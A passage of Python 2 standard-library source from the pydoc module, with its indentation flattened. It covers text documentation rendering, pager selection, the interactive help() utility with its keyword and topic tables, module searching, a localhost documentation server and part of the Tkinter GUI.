ok, attrs = _split_list(attrs, predicate)
if ok:
hr.maybe()
push(msg)
for name, kind, homecls, value in ok:
push(self.document(getattr(object, name),
name, mod, object))
return attrs
def spilldescriptors(msg, attrs, predicate):
ok, attrs = _split_list(attrs, predicate)
if ok:
hr.maybe()
push(msg)
for name, kind, homecls, value in ok:
push(self._docdescriptor(name, value, mod))
return attrs
def spilldata(msg, attrs, predicate):
ok, attrs = _split_list(attrs, predicate)
if ok:
hr.maybe()
push(msg)
for name, kind, homecls, value in ok:
if (hasattr(value, '__call__') or
inspect.isdatadescriptor(value)):
doc = getdoc(value)
else:
doc = None
push(self.docother(getattr(object, name),
name, mod, maxlen=70, doc=doc) + '\n')
return attrs
attrs = filter(lambda data: visiblename(data[0]),
classify_class_attrs(object))
while attrs:
if mro:
thisclass = mro.popleft()
else:
thisclass = attrs[0][2]
attrs, inherited = _split_list(attrs, lambda t: t[2] is thisclass)
if thisclass is __builtin__.object:
attrs = inherited
continue
elif thisclass is object:
tag = "defined here"
else:
tag = "inherited from %s" % classname(thisclass,
object.__module__)
# Sort attrs by name.
attrs.sort()
# Pump out the attrs, segregated by kind.
attrs = spill("Methods %s:\n" % tag, attrs,
lambda t: t[1] == 'method')
attrs = spill("Class methods %s:\n" % tag, attrs,
lambda t: t[1] == 'class method')
attrs = spill("Static methods %s:\n" % tag, attrs,
lambda t: t[1] == 'static method')
attrs = spilldescriptors("Data descriptors %s:\n" % tag, attrs,
lambda t: t[1] == 'data descriptor')
attrs = spilldata("Data and other attributes %s:\n" % tag, attrs,
lambda t: t[1] == 'data')
assert attrs == []
attrs = inherited
contents = '\n'.join(contents)
if not contents:
return title + '\n'
return title + '\n' + self.indent(rstrip(contents), ' | ') + '\n'
def formatvalue(self, object):
"""Format an argument default value as text."""
return '=' + self.repr(object)
def docroutine(self, object, name=None, mod=None, cl=None):
"""Produce text documentation for a function or method object."""
realname = object.__name__
name = name or realname
note = ''
skipdocs = 0
if inspect.ismethod(object):
imclass = object.im_class
if cl:
if imclass is not cl:
note = ' from ' + classname(imclass, mod)
else:
if object.im_self is not None:
note = ' method of %s instance' % classname(
object.im_self.__class__, mod)
else:
note = ' unbound %s method' % classname(imclass,mod)
object = object.im_func
if name == realname:
title = self.bold(realname)
else:
if (cl and realname in cl.__dict__ and
cl.__dict__[realname] is object):
skipdocs = 1
title = self.bold(name) + ' = ' + realname
if inspect.isfunction(object):
args, varargs, varkw, defaults = inspect.getargspec(object)
argspec = inspect.formatargspec(
args, varargs, varkw, defaults, formatvalue=self.formatvalue)
if realname == '<lambda>':
title = self.bold(name) + ' lambda '
argspec = argspec[1:-1] # remove parentheses
else:
argspec = '(...)'
decl = title + argspec + note
if skipdocs:
return decl + '\n'
else:
doc = getdoc(object) or ''
return decl + '\n' + (doc and rstrip(self.indent(doc)) + '\n')
def _docdescriptor(self, name, value, mod):
results = []
push = results.append
if name:
push(self.bold(name))
push('\n')
doc = getdoc(value) or ''
if doc:
push(self.indent(doc))
push('\n')
return ''.join(results)
def docproperty(self, object, name=None, mod=None, cl=None):
"""Produce text documentation for a property."""
return self._docdescriptor(name, object, mod)
def docdata(self, object, name=None, mod=None, cl=None):
"""Produce text documentation for a data descriptor."""
return self._docdescriptor(name, object, mod)
def docother(self, object, name=None, mod=None, parent=None, maxlen=None, doc=None):
"""Produce text documentation for a data object."""
repr = self.repr(object)
if maxlen:
line = (name and name + ' = ' or '') + repr
chop = maxlen - len(line)
if chop < 0: repr = repr[:chop] + '...'
line = (name and self.bold(name) + ' = ' or '') + repr
if doc is not None:
line += '\n' + self.indent(str(doc))
return line
# --------------------------------------------------------- user interfaces
def pager(text):
"""The first time this is called, determine what kind of pager to use."""
global pager
pager = getpager()
pager(text)
def getpager():
"""Decide what method to use for paging through text."""
if sys.platform.startswith('java'):
return plainpager
if type(sys.stdout) is not types.FileType:
return plainpager
if not sys.stdin.isatty() or not sys.stdout.isatty():
return plainpager
if 'PAGER' in os.environ:
if sys.platform == 'win32': # pipes completely broken in Windows
return lambda text: tempfilepager(plain(text), os.environ['PAGER'])
elif os.environ.get('TERM') in ('dumb', 'emacs'):
return lambda text: pipepager(plain(text), os.environ['PAGER'])
else:
return lambda text: pipepager(text, os.environ['PAGER'])
if os.environ.get('TERM') in ('dumb', 'emacs'):
return plainpager
if sys.platform == 'win32' or sys.platform.startswith('os2'):
return lambda text: tempfilepager(plain(text), 'more <')
if hasattr(os, 'system') and os.system('(less) 2>/dev/null') == 0:
return lambda text: pipepager(text, 'less')
import tempfile
(fd, filename) = tempfile.mkstemp()
os.close(fd)
try:
if hasattr(os, 'system') and os.system('more "%s"' % filename) == 0:
return lambda text: pipepager(text, 'more')
else:
return ttypager
finally:
os.unlink(filename)
def plain(text):
"""Remove boldface formatting from text."""
return re.sub('.\b', '', text)
def pipepager(text, cmd):
"""Page through text by feeding it to another program."""
pipe = os.popen(cmd, 'w')
try:
pipe.write(text)
pipe.close()
except IOError:
pass # Ignore broken pipes caused by quitting the pager program.
def tempfilepager(text, cmd):
"""Page through text by invoking a program on a temporary file."""
import tempfile
filename = tempfile.mktemp()
file = open(filename, 'w')
file.write(text)
file.close()
try:
os.system(cmd + ' "' + filename + '"')
finally:
os.unlink(filename)
def ttypager(text):
"""Page through text on a text terminal."""
lines = split(plain(text), '\n')
try:
import tty
fd = sys.stdin.fileno()
old = tty.tcgetattr(fd)
tty.setcbreak(fd)
getchar = lambda: sys.stdin.read(1)
except (ImportError, AttributeError):
tty = None
getchar = lambda: sys.stdin.readline()[:-1][:1]
try:
r = inc = os.environ.get('LINES', 25) - 1
sys.stdout.write(join(lines[:inc], '\n') + '\n')
while lines[r:]:
sys.stdout.write('-- more --')
sys.stdout.flush()
c = getchar()
if c in ('q', 'Q'):
sys.stdout.write('\r \r')
break
elif c in ('\r', '\n'):
sys.stdout.write('\r \r' + lines[r] + '\n')
r = r + 1
continue
if c in ('b', 'B', '\x1b'):
r = r - inc - inc
if r < 0: r = 0
sys.stdout.write('\n' + join(lines[r:r+inc], '\n') + '\n')
r = r + inc
finally:
if tty:
tty.tcsetattr(fd, tty.TCSAFLUSH, old)
def plainpager(text):
"""Simply print unformatted text. This is the ultimate fallback."""
sys.stdout.write(plain(text))
def describe(thing):
"""Produce a short description of the given thing."""
if inspect.ismodule(thing):
if thing.__name__ in sys.builtin_module_names:
return 'built-in module ' + thing.__name__
if hasattr(thing, '__path__'):
return 'package ' + thing.__name__
else:
return 'module ' + thing.__name__
if inspect.isbuiltin(thing):
return 'built-in function ' + thing.__name__
if inspect.isgetsetdescriptor(thing):
return 'getset descriptor %s.%s.%s' % (
thing.__objclass__.__module__, thing.__objclass__.__name__,
thing.__name__)
if inspect.ismemberdescriptor(thing):
return 'member descriptor %s.%s.%s' % (
thing.__objclass__.__module__, thing.__objclass__.__name__,
thing.__name__)
if inspect.isclass(thing):
return 'class ' + thing.__name__
if inspect.isfunction(thing):
return 'function ' + thing.__name__
if inspect.ismethod(thing):
return 'method ' + thing.__name__
if type(thing) is types.InstanceType:
return 'instance of ' + thing.__class__.__name__
return type(thing).__name__
def locate(path, forceload=0):
"""Locate an object by name or dotted path, importing as necessary."""
parts = [part for part in split(path, '.') if part]
module, n = None, 0
while n < len(parts):
nextmodule = safeimport(join(parts[:n+1], '.'), forceload)
if nextmodule: module, n = nextmodule, n + 1
else: break
if module:
object = module
for part in parts[n:]:
try: object = getattr(object, part)
except AttributeError: return None
return object
else:
if hasattr(__builtin__, path):
return getattr(__builtin__, path)
# --------------------------------------- interactive interpreter interface
text = TextDoc()
html = HTMLDoc()
class _OldStyleClass: pass
_OLD_INSTANCE_TYPE = type(_OldStyleClass())
def resolve(thing, forceload=0):
"""Given an object or a path to an object, get the object and its name."""
if isinstance(thing, str):
object = locate(thing, forceload)
if not object:
raise ImportError, 'no Python documentation found for %r' % thing
return object, thing
else:
return thing, getattr(thing, '__name__', None)
def render_doc(thing, title='Python Library Documentation: %s', forceload=0):
"""Render text documentation, given an object or a path to an object."""
object, name = resolve(thing, forceload)
desc = describe(object)
module = inspect.getmodule(object)
if name and '.' in name:
desc += ' in ' + name[:name.rfind('.')]
elif module and module is not object:
desc += ' in module ' + module.__name__
if type(object) is _OLD_INSTANCE_TYPE:
# If the passed object is an instance of an old-style class,
# document its available methods instead of its value.
object = object.__class__
elif not (inspect.ismodule(object) or
inspect.isclass(object) or
inspect.isroutine(object) or
inspect.isgetsetdescriptor(object) or
inspect.ismemberdescriptor(object) or
isinstance(object, property)):
# If the passed object is a piece of data or an instance,
# document its available methods instead of its value.
object = type(object)
desc += ' object'
return title % desc + '\n\n' + text.document(object, name)
def doc(thing, title='Python Library Documentation: %s', forceload=0):
"""Display text documentation, given an object or a path to an object."""
try:
pager(render_doc(thing, title, forceload))
except (ImportError, ErrorDuringImport), value:
print value
def writedoc(thing, forceload=0):
"""Write HTML documentation to a file in the current directory."""
try:
object, name = resolve(thing, forceload)
page = html.page(describe(object), html.document(object, name))
file = open(name + '.html', 'w')
file.write(page)
file.close()
print 'wrote', name + '.html'
except (ImportError, ErrorDuringImport), value:
print value
def writedocs(dir, pkgpath='', done=None):
"""Write out HTML documentation for all modules in a directory tree."""
if done is None: done = {}
for importer, modname, ispkg in pkgutil.walk_packages([dir], pkgpath):
writedoc(modname)
return
class Helper:
# These dictionaries map a topic name to either an alias, or a tuple
# (label, seealso-items). The "label" is the label of the corresponding
# section in the .rst file under Doc/ and an index into the dictionary
# in pydoc_data/topics.py.
#
# CAUTION: if you change one of these dictionaries, be sure to adapt the
# list of needed labels in Doc/tools/sphinxext/pyspecific.py and
# regenerate the pydoc_data/topics.py file by running
# make pydoc-topics
# in Doc/ and copying the output file into the Lib/ directory.
keywords = {
'and': 'BOOLEAN',
'as': 'with',
'assert': ('assert', ''),
'break': ('break', 'while for'),
'class': ('class', 'CLASSES SPECIALMETHODS'),
'continue': ('continue', 'while for'),
'def': ('function', ''),
'del': ('del', 'BASICMETHODS'),
'elif': 'if',
'else': ('else', 'while for'),
'except': 'try',
'exec': ('exec', ''),
'finally': 'try',
'for': ('for', 'break continue while'),
'from': 'import',
'global': ('global', 'NAMESPACES'),
'if': ('if', 'TRUTHVALUE'),
'import': ('import', 'MODULES'),
'in': ('in', 'SEQUENCEMETHODS2'),
'is': 'COMPARISON',
'lambda': ('lambda', 'FUNCTIONS'),
'not': 'BOOLEAN',
'or': 'BOOLEAN',
'pass': ('pass', ''),
'print': ('print', ''),
'raise': ('raise', 'EXCEPTIONS'),
'return': ('return', 'FUNCTIONS'),
'try': ('try', 'EXCEPTIONS'),
'while': ('while', 'break continue if TRUTHVALUE'),
'with': ('with', 'CONTEXTMANAGERS EXCEPTIONS yield'),
'yield': ('yield', ''),
}
# Either add symbols to this dictionary or to the symbols dictionary
# directly: Whichever is easier. They are merged later.
_symbols_inverse = {
'STRINGS' : ("'", "'''", "r'", "u'", '"""', '"', 'r"', 'u"'),
'OPERATORS' : ('+', '-', '*', '**', '/', '//', '%', '<<', '>>', '&',
'|', '^', '~', '<', '>', '<=', '>=', '==', '!=', '<>'),
'COMPARISON' : ('<', '>', '<=', '>=', '==', '!=', '<>'),
'UNARY' : ('-', '~'),
'AUGMENTEDASSIGNMENT' : ('+=', '-=', '*=', '/=', '%=', '&=', '|=',
'^=', '<<=', '>>=', '**=', '//='),
'BITWISE' : ('<<', '>>', '&', '|', '^', '~'),
'COMPLEX' : ('j', 'J')
}
symbols = {
'%': 'OPERATORS FORMATTING',
'**': 'POWER',
',': 'TUPLES LISTS FUNCTIONS',
'.': 'ATTRIBUTES FLOAT MODULES OBJECTS',
'...': 'ELLIPSIS',
':': 'SLICINGS DICTIONARYLITERALS',
'@': 'def class',
'\\': 'STRINGS',
'_': 'PRIVATENAMES',
'__': 'PRIVATENAMES SPECIALMETHODS',
'`': 'BACKQUOTES',
'(': 'TUPLES FUNCTIONS CALLS',
')': 'TUPLES FUNCTIONS CALLS',
'[': 'LISTS SUBSCRIPTS SLICINGS',
']': 'LISTS SUBSCRIPTS SLICINGS'
}
for topic, symbols_ in _symbols_inverse.iteritems():
for symbol in symbols_:
topics = symbols.get(symbol, topic)
if topic not in topics:
topics = topics + ' ' + topic
symbols[symbol] = topics
topics = {
'TYPES': ('types', 'STRINGS UNICODE NUMBERS SEQUENCES MAPPINGS '
'FUNCTIONS CLASSES MODULES FILES inspect'),
'STRINGS': ('strings', 'str UNICODE SEQUENCES STRINGMETHODS FORMATTING '
'TYPES'),
'STRINGMETHODS': ('string-methods', 'STRINGS FORMATTING'),
'FORMATTING': ('formatstrings', 'OPERATORS'),
'UNICODE': ('strings', 'encodings unicode SEQUENCES STRINGMETHODS '
'FORMATTING TYPES'),
'NUMBERS': ('numbers', 'INTEGER FLOAT COMPLEX TYPES'),
'INTEGER': ('integers', 'int range'),
'FLOAT': ('floating', 'float math'),
'COMPLEX': ('imaginary', 'complex cmath'),
'SEQUENCES': ('typesseq', 'STRINGMETHODS FORMATTING xrange LISTS'),
'MAPPINGS': 'DICTIONARIES',
'FUNCTIONS': ('typesfunctions', 'def TYPES'),
'METHODS': ('typesmethods', 'class def CLASSES TYPES'),
'CODEOBJECTS': ('bltin-code-objects', 'compile FUNCTIONS TYPES'),
'TYPEOBJECTS': ('bltin-type-objects', 'types TYPES'),
'FRAMEOBJECTS': 'TYPES',
'TRACEBACKS': 'TYPES',
'NONE': ('bltin-null-object', ''),
'ELLIPSIS': ('bltin-ellipsis-object', 'SLICINGS'),
'FILES': ('bltin-file-objects', ''),
'SPECIALATTRIBUTES': ('specialattrs', ''),
'CLASSES': ('types', 'class SPECIALMETHODS PRIVATENAMES'),
'MODULES': ('typesmodules', 'import'),
'PACKAGES': 'import',
'EXPRESSIONS': ('operator-summary', 'lambda or and not in is BOOLEAN '
'COMPARISON BITWISE SHIFTING BINARY FORMATTING POWER '
'UNARY ATTRIBUTES SUBSCRIPTS SLICINGS CALLS TUPLES '
'LISTS DICTIONARIES BACKQUOTES'),
'OPERATORS': 'EXPRESSIONS',
'PRECEDENCE': 'EXPRESSIONS',
'OBJECTS': ('objects', 'TYPES'),
'SPECIALMETHODS': ('specialnames', 'BASICMETHODS ATTRIBUTEMETHODS '
'CALLABLEMETHODS SEQUENCEMETHODS1 MAPPINGMETHODS '
'SEQUENCEMETHODS2 NUMBERMETHODS CLASSES'),
'BASICMETHODS': ('customization', 'cmp hash repr str SPECIALMETHODS'),
'ATTRIBUTEMETHODS': ('attribute-access', 'ATTRIBUTES SPECIALMETHODS'),
'CALLABLEMETHODS': ('callable-types', 'CALLS SPECIALMETHODS'),
'SEQUENCEMETHODS1': ('sequence-types', 'SEQUENCES SEQUENCEMETHODS2 '
'SPECIALMETHODS'),
'SEQUENCEMETHODS2': ('sequence-methods', 'SEQUENCES SEQUENCEMETHODS1 '
'SPECIALMETHODS'),
'MAPPINGMETHODS': ('sequence-types', 'MAPPINGS SPECIALMETHODS'),
'NUMBERMETHODS': ('numeric-types', 'NUMBERS AUGMENTEDASSIGNMENT '
'SPECIALMETHODS'),
'EXECUTION': ('execmodel', 'NAMESPACES DYNAMICFEATURES EXCEPTIONS'),
'NAMESPACES': ('naming', 'global ASSIGNMENT DELETION DYNAMICFEATURES'),
'DYNAMICFEATURES': ('dynamic-features', ''),
'SCOPING': 'NAMESPACES',
'FRAMES': 'NAMESPACES',
'EXCEPTIONS': ('exceptions', 'try except finally raise'),
'COERCIONS': ('coercion-rules','CONVERSIONS'),
'CONVERSIONS': ('conversions', 'COERCIONS'),
'IDENTIFIERS': ('identifiers', 'keywords SPECIALIDENTIFIERS'),
'SPECIALIDENTIFIERS': ('id-classes', ''),
'PRIVATENAMES': ('atom-identifiers', ''),
'LITERALS': ('atom-literals', 'STRINGS BACKQUOTES NUMBERS '
'TUPLELITERALS LISTLITERALS DICTIONARYLITERALS'),
'TUPLES': 'SEQUENCES',
'TUPLELITERALS': ('exprlists', 'TUPLES LITERALS'),
'LISTS': ('typesseq-mutable', 'LISTLITERALS'),
'LISTLITERALS': ('lists', 'LISTS LITERALS'),
'DICTIONARIES': ('typesmapping', 'DICTIONARYLITERALS'),
'DICTIONARYLITERALS': ('dict', 'DICTIONARIES LITERALS'),
'BACKQUOTES': ('string-conversions', 'repr str STRINGS LITERALS'),
'ATTRIBUTES': ('attribute-references', 'getattr hasattr setattr '
'ATTRIBUTEMETHODS'),
'SUBSCRIPTS': ('subscriptions', 'SEQUENCEMETHODS1'),
'SLICINGS': ('slicings', 'SEQUENCEMETHODS2'),
'CALLS': ('calls', 'EXPRESSIONS'),
'POWER': ('power', 'EXPRESSIONS'),
'UNARY': ('unary', 'EXPRESSIONS'),
'BINARY': ('binary', 'EXPRESSIONS'),
'SHIFTING': ('shifting', 'EXPRESSIONS'),
'BITWISE': ('bitwise', 'EXPRESSIONS'),
'COMPARISON': ('comparisons', 'EXPRESSIONS BASICMETHODS'),
'BOOLEAN': ('booleans', 'EXPRESSIONS TRUTHVALUE'),
'ASSERTION': 'assert',
'ASSIGNMENT': ('assignment', 'AUGMENTEDASSIGNMENT'),
'AUGMENTEDASSIGNMENT': ('augassign', 'NUMBERMETHODS'),
'DELETION': 'del',
'PRINTING': 'print',
'RETURNING': 'return',
'IMPORTING': 'import',
'CONDITIONAL': 'if',
'LOOPING': ('compound', 'for while break continue'),
'TRUTHVALUE': ('truth', 'if while and or not BASICMETHODS'),
'DEBUGGING': ('debugger', 'pdb'),
'CONTEXTMANAGERS': ('context-managers', 'with'),
}
def __init__(self, input=None, output=None):
self._input = input
self._output = output
input = property(lambda self: self._input or sys.stdin)
output = property(lambda self: self._output or sys.stdout)
def __repr__(self):
if inspect.stack()[1][3] == '?':
self()
return ''
return '<pydoc.Helper instance>'
_GoInteractive = object()
def __call__(self, request=_GoInteractive):
if request is not self._GoInteractive:
self.help(request)
else:
self.intro()
self.interact()
self.output.write('''
You are now leaving help and returning to the Python interpreter.
If you want to ask for help on a particular object directly from the
interpreter, you can type "help(object)". Executing "help('string')"
has the same effect as typing a particular string at the help> prompt.
''')
def interact(self):
self.output.write('\n')
while True:
try:
request = self.getline('help> ')
if not request: break
except (KeyboardInterrupt, EOFError):
break
request = strip(replace(request, '"', '', "'", ''))
if lower(request) in ('q', 'quit'): break
self.help(request)
def getline(self, prompt):
"""Read one line, using raw_input when available."""
if self.input is sys.stdin:
return raw_input(prompt)
else:
self.output.write(prompt)
self.output.flush()
return self.input.readline()
def help(self, request):
if type(request) is type(''):
request = request.strip()
if request == 'help': self.intro()
elif request == 'keywords': self.listkeywords()
elif request == 'symbols': self.listsymbols()
elif request == 'topics': self.listtopics()
elif request == 'modules': self.listmodules()
elif request[:8] == 'modules ':
self.listmodules(split(request)[1])
elif request in self.symbols: self.showsymbol(request)
elif request in self.keywords: self.showtopic(request)
elif request in self.topics: self.showtopic(request)
elif request: doc(request, 'Help on %s:')
elif isinstance(request, Helper): self()
else: doc(request, 'Help on %s:')
self.output.write('\n')
def intro(self):
self.output.write('''
Welcome to Python %s! This is the online help utility.
If this is your first time using Python, you should definitely check out
the tutorial on the Internet at http://docs.python.org/tutorial/.
Enter the name of any module, keyword, or topic to get help on writing
Python programs and using Python modules. To quit this help utility and
return to the interpreter, just type "quit".
To get a list of available modules, keywords, or topics, type "modules",
"keywords", or "topics". Each module also comes with a one-line summary
of what it does; to list the modules whose summaries contain a given word
such as "spam", type "modules spam".
''' % sys.version[:3])
def list(self, items, columns=4, width=80):
items = items[:]
items.sort()
colw = width / columns
rows = (len(items) + columns - 1) / columns
for row in range(rows):
for col in range(columns):
i = col * rows + row
if i < len(items):
self.output.write(items[i])
if col < columns - 1:
self.output.write(' ' + ' ' * (colw-1 - len(items[i])))
self.output.write('\n')
def listkeywords(self):
self.output.write('''
Here is a list of the Python keywords. Enter any keyword to get more help.
''')
self.list(self.keywords.keys())
def listsymbols(self):
self.output.write('''
Here is a list of the punctuation symbols which Python assigns special meaning
to. Enter any symbol to get more help.
''')
self.list(self.symbols.keys())
def listtopics(self):
self.output.write('''
Here is a list of available topics. Enter any topic name to get more help.
''')
self.list(self.topics.keys())
def showtopic(self, topic, more_xrefs=''):
try:
import pydoc_data.topics
except ImportError:
self.output.write('''
Sorry, topic and keyword documentation is not available because the
module "pydoc_data.topics" could not be found.
''')
return
target = self.topics.get(topic, self.keywords.get(topic))
if not target:
self.output.write('no documentation found for %s\n' % repr(topic))
return
if type(target) is type(''):
return self.showtopic(target, more_xrefs)
label, xrefs = target
try:
doc = pydoc_data.topics.topics[label]
except KeyError:
self.output.write('no documentation found for %s\n' % repr(topic))
return
pager(strip(doc) + '\n')
if more_xrefs:
xrefs = (xrefs or '') + ' ' + more_xrefs
if xrefs:
import StringIO, formatter
buffer = StringIO.StringIO()
formatter.DumbWriter(buffer).send_flowing_data(
'Related help topics: ' + join(split(xrefs), ', ') + '\n')
self.output.write('\n%s\n' % buffer.getvalue())
def showsymbol(self, symbol):
target = self.symbols[symbol]
topic, _, xrefs = target.partition(' ')
self.showtopic(topic, xrefs)
def listmodules(self, key=''):
if key:
self.output.write('''
Here is a list of matching modules. Enter any module name to get more help.
''')
apropos(key)
else:
self.output.write('''
Please wait a moment while I gather a list of all available modules...
''')
modules = {}
def callback(path, modname, desc, modules=modules):
if modname and modname[-9:] == '.__init__':
modname = modname[:-9] + ' (package)'
if find(modname, '.') < 0:
modules[modname] = 1
def onerror(modname):
callback(None, modname, None)
ModuleScanner().run(callback, onerror=onerror)
self.list(modules.keys())
self.output.write('''
Enter any module name to get more help. Or, type "modules spam" to search
for modules whose descriptions contain the word "spam".
''')
help = Helper()
class Scanner:
"""A generic tree iterator."""
def __init__(self, roots, children, descendp):
self.roots = roots[:]
self.state = []
self.children = children
self.descendp = descendp
def next(self):
if not self.state:
if not self.roots:
return None
root = self.roots.pop(0)
self.state = [(root, self.children(root))]
node, children = self.state[-1]
if not children:
self.state.pop()
return self.next()
child = children.pop(0)
if self.descendp(child):
self.state.append((child, self.children(child)))
return child
class ModuleScanner:
"""An interruptible scanner that searches module synopses."""
def run(self, callback, key=None, completer=None, onerror=None):
if key: key = lower(key)
self.quit = False
seen = {}
for modname in sys.builtin_module_names:
if modname != '__main__':
seen[modname] = 1
if key is None:
callback(None, modname, '')
else:
desc = split(__import__(modname).__doc__ or '', '\n')[0]
if find(lower(modname + ' - ' + desc), key) >= 0:
callback(None, modname, desc)
for importer, modname, ispkg in pkgutil.walk_packages(onerror=onerror):
if self.quit:
break
if key is None:
callback(None, modname, '')
else:
loader = importer.find_module(modname)
if hasattr(loader,'get_source'):
import StringIO
desc = source_synopsis(
StringIO.StringIO(loader.get_source(modname))
) or ''
if hasattr(loader,'get_filename'):
path = loader.get_filename(modname)
else:
path = None
else:
module = loader.load_module(modname)
desc = (module.__doc__ or '').splitlines()[0]
path = getattr(module,'__file__',None)
if find(lower(modname + ' - ' + desc), key) >= 0:
callback(path, modname, desc)
if completer:
completer()
def apropos(key):
"""Print all the one-line module summaries that contain a substring."""
def callback(path, modname, desc):
if modname[-9:] == '.__init__':
modname = modname[:-9] + ' (package)'
print modname, desc and '- ' + desc
try: import warnings
except ImportError: pass
else: warnings.filterwarnings('ignore') # ignore problems during import
ModuleScanner().run(callback, key)
# --------------------------------------------------- web browser interface
def serve(port, callback=None, completer=None):
import BaseHTTPServer, mimetools, select
# Patch up mimetools.Message so it doesn't break if rfc822 is reloaded.
class Message(mimetools.Message):
def __init__(self, fp, seekable=1):
Message = self.__class__
Message.__bases__[0].__bases__[0].__init__(self, fp, seekable)
self.encodingheader = self.getheader('content-transfer-encoding')
self.typeheader = self.getheader('content-type')
self.parsetype()
self.parseplist()
class DocHandler(BaseHTTPServer.BaseHTTPRequestHandler):
def send_document(self, title, contents):
try:
self.send_response(200)
self.send_header('Content-Type', 'text/html')
self.end_headers()
self.wfile.write(html.page(title, contents))
except IOError: pass
def do_GET(self):
path = self.path
if path[-5:] == '.html': path = path[:-5]
if path[:1] == '/': path = path[1:]
if path and path != '.':
try:
obj = locate(path, forceload=1)
except ErrorDuringImport, value:
self.send_document(path, html.escape(str(value)))
return
if obj:
self.send_document(describe(obj), html.document(obj, path))
else:
self.send_document(path,
'no Python documentation found for %s' % repr(path))
else:
heading = html.heading(
'<big><big><strong>Python: Index of Modules</strong></big></big>',
'#ffffff', '#7799ee')
def bltinlink(name):
return '<a href="%s.html">%s</a>' % (name, name)
names = filter(lambda x: x != '__main__',
sys.builtin_module_names)
contents = html.multicolumn(names, bltinlink)
indices = ['<p>' + html.bigsection(
'Built-in Modules', '#ffffff', '#ee77aa', contents)]
seen = {}
for dir in sys.path:
indices.append(html.index(dir, seen))
contents = heading + join(indices) + '''<p align=right>
<font color="#909090" face="helvetica, arial"><strong>
pydoc</strong> by Ka-Ping Yee <ping@lfw.org></font>'''
self.send_document('Index of Modules', contents)
def log_message(self, *args): pass
class DocServer(BaseHTTPServer.HTTPServer):
def __init__(self, port, callback):
host = 'localhost'
self.address = (host, port)
self.url = 'http://%s:%d/' % (host, port)
self.callback = callback
self.base.__init__(self, self.address, self.handler)
def serve_until_quit(self):
import sys
if sys.platform.startswith('java'):
from select import cpython_compatible_select as select
else:
from select import select
self.quit = False
while not self.quit:
rd, wr, ex = select([self.socket], [], [], 1)
if rd: self.handle_request()
def server_activate(self):
self.base.server_activate(self)
if self.callback: self.callback(self)
DocServer.base = BaseHTTPServer.HTTPServer
DocServer.handler = DocHandler
DocHandler.MessageClass = Message
try:
try:
DocServer(port, callback).serve_until_quit()
except (KeyboardInterrupt, select.error):
pass
finally:
if completer: completer()
# ----------------------------------------------------- graphical interface
def gui():
"""Graphical interface (starts web server and pops up a control window)."""
class GUI:
def __init__(self, window, port=7464):
self.window = window
self.server = None
self.scanner = None
import Tkinter
self.server_frm = Tkinter.Frame(window)
self.title_lbl = Tkinter.Label(self.server_frm,
text='Starting server...\n ')
self.open_btn = Tkinter.Button(self.server_frm,
text='open browser', command=self.open, state='disabled')
self.quit_btn = Tkinter.Button(self.server_frm,
text='quit serving', command=self.quit, state='disabled')
self.search_frm = Tkinter.Frame(window)
self.search_lbl = Tkinter.Label(self.search_frm, text='Search for')
self.search_ent = Tkinter.Entry(self.search_frm)
self.search_ent.bind('<Return>', self.search)
self.stop_btn = Tkinter.Button(self.search_frm,
text='stop', pady=0, command=self.stop, state='disabled')
if sys.platform == 'win32':
# Trying to hide and show this button crashes under Windows.
self.stop_btn.pack(side='right')
self.window.title('pydoc')
self.window.protocol('WM_DELETE_WINDOW', self.quit)
self.title_lbl.pack(side='top', fill='x')
self.open_btn.pack(side='left', fill='x', expand=1)
self.quit_btn.pack(side='right', fill='x', expand=1)
self.server_frm.pack(side='top', fill='x')
self.search_lbl.pack(side='left')
self.search_ent.pack(side='right', fill='x', expand=1)
self.search_frm.pack(side='top', fill='x')
self.search_ent.focus_set()
font = ('helvetica', sys.platform == 'win32' and 8 or 10)
self.result_lst = Tkinter.Listbox(window, font=font, height=6)
self.result_lst.bind('<Button-1>', self.select)
self.result_lst.bind('<Double-Button-1>', self.goto)
self.result_scr = Tkinter.Scrollbar(window,
orient='vertical', command=self.result_lst.yview)
self.result_lst.config(yscrollcommand=self.result_scr.set)
self.result_frm = Tkinter.Frame(window)
self.goto_btn = Tkinter.Button(self.result_frm,
text='go to selected', command=self.goto)
self.hide_btn = Tkinter.Button(self.result_frm,
text='hide results', command=self.hide)
self.goto_btn.pack(side='left', fill='x', expand=1)
self.hide_btn.pack(side='right', fill='x', expand=1)
self.window.update()
self.minwidth = self.window.winfo_width()
self.minheight = self.window.winfo_height()
self.bigminheight = (self.server_frm.winfo_reqheight() +
self.search_frm.winfo_reqheight() +
self.result_lst.winfo_reqheight() +
self.result_frm.winfo_reqheight())
self.bigwidth, self.bigheight = self.minwidth, self.bigminheight
self.expanded = 0
self.window.wm_geometry('%dx%d' % (self.minwidth, self.minheight))
self.window.wm_minsize(self.minwidth, self.minheight)
self.window.tk.willdispatch()
import threading
threading.Thread(
target=serve, args=(port, self.ready, self.quit)).start()
def ready(self, server):
self.server = server
self.title_lbl.config(
text='Python documentation server at\n' + server.url)
self.open_btn.config(state='normal')
self.quit_btn.config(state='normal')
def open(self, event=None, url=None):
url = url or self.server.url
try:
import webbrowser
webbrowser.open(url)
except ImportError: # pre-webbrowser.py compatibility
if sys.platform == 'win32':
os.system('start "%s"' % url)
else:
rc = os.system('netscape -remote "openURL(%s)" &' % url)
if rc: os.system('netscape "%s" &' % url)
def quit(self, event=None):
if self.server:
self.server.quit = 1
self.window.quit()
def search(self, event=None):
key = self.search_ent.get()
self.stop_btn.pack(side='right')
self.stop_btn.config(state='normal')
self.search_lbl.config(text='Searching for "%s"...' % key)
self.search_ent.forget()
self.search_lbl.pack(side='left')
self.result_lst.delete(0, 'end')
self.goto_btn.config(state='disabled')
self.expand()
import threading
if self.scanner:
self.scanner.quit = 1
self.scanner = ModuleScanner()
threading.Thread(target=self.scanner.run,
args=(self.update, key, self.done)).start()
def update(self, path, modname, desc):
if modname[-9:] == '.__init__':
modname = modname[:-9] + ' (package)'
self.result_lst.insert('end',
modname + ' - ' + (desc or '(no description)'))
def stop(self, event=None):
if self.scanner:
self.scanner.quit = 1
self.scanner = None
def done(self):
self.scanner = None
self.search_lbl.config(text='Search for')
self.search_lbl.pack(side='left')
self.search_ent.pack(side='right', fill='x', expand=1)
if sys.platform != 'win32': self.stop_btn.forget()
self.stop_btn.config(state='disabled')
def select(self, event=None):
self.goto_btn.config(state='normal')
def goto(self, event=None):
selection = self.result_lst.curselection()
if selection:
modname = split(self.result_lst.get(selection[0]))[0]
self.open(url=self.server.url + modname + '.html')
def collapse(self):
if not self.expanded: return
self.result_frm.forget()
self.result_scr.forget()
self.result_lst.forget()
self.bigwidth = self.window.winfo_width()
